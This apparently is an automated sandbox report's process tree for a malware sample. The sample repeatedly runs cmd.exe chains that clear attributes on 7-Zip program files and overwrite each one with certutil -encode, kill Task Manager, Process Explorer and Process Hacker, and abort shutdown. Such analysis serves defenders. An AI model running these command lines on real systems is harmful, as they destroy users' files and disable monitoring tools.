C:\Windows\system32\certutil.execertutil -encode -f "7z.sfx" "7z.sfx".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zCon.sfx" "7zCon.sfx".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zCon.sfx" "7zCon.sfx".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zFM.exe" "7zFM.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zFM.exe" "7zFM.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zG.exe" "7zG.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zG.exe" "7zG.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "descript.ion" "descript.ion".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "descript.ion" "descript.ion".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "History.txt" "History.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "History.txt" "History.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Lang" "Lang".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "License.txt" "License.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "License.txt" "License.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "readme.txt" "readme.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "readme.txt" "readme.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall.exe" "Uninstall.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Uninstall.exe" "Uninstall.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "af.txt" "af.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "af.txt" "af.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "an.txt" "an.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "an.txt" "an.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ar.txt" "ar.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ar.txt" "ar.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ast.txt" "ast.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ast.txt" "ast.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "az.txt" "az.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "az.txt" "az.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ba.txt" "ba.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ba.txt" "ba.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "be.txt" "be.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "be.txt" "be.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bg.txt" "bg.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "bg.txt" "bg.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bn.txt" "bn.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "bn.txt" "bn.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "br.txt" "br.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "br.txt" "br.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ca.txt" "ca.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ca.txt" "ca.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "co.txt" "co.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "co.txt" "co.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cs.txt" "cs.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "cs.txt" "cs.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cy.txt" "cy.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "cy.txt" "cy.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "da.txt" "da.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "da.txt" "da.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "de.txt" "de.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "de.txt" "de.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "el.txt" "el.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "el.txt" "el.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "en.ttt" "en.ttt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "en.ttt" "en.ttt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eo.txt" "eo.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "eo.txt" "eo.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "es.txt" "es.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "es.txt" "es.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "et.txt" "et.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "et.txt" "et.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eu.txt" "eu.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "eu.txt" "eu.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ext.txt" "ext.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ext.txt" "ext.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fa.txt" "fa.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fa.txt" "fa.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fi.txt" "fi.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fi.txt" "fi.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fr.txt" "fr.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fr.txt" "fr.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fur.txt" "fur.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fur.txt" "fur.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fy.txt" "fy.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "fy.txt" "fy.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ga.txt" "ga.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ga.txt" "ga.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gl.txt" "gl.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "gl.txt" "gl.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gu.txt" "gu.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "gu.txt" "gu.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "he.txt" "he.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "he.txt" "he.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hi.txt" "hi.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hi.txt" "hi.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hr.txt" "hr.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hr.txt" "hr.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hu.txt" "hu.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hu.txt" "hu.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hy.txt" "hy.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "hy.txt" "hy.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "id.txt" "id.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "id.txt" "id.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "io.txt" "io.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "io.txt" "io.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "is.txt" "is.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "is.txt" "is.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
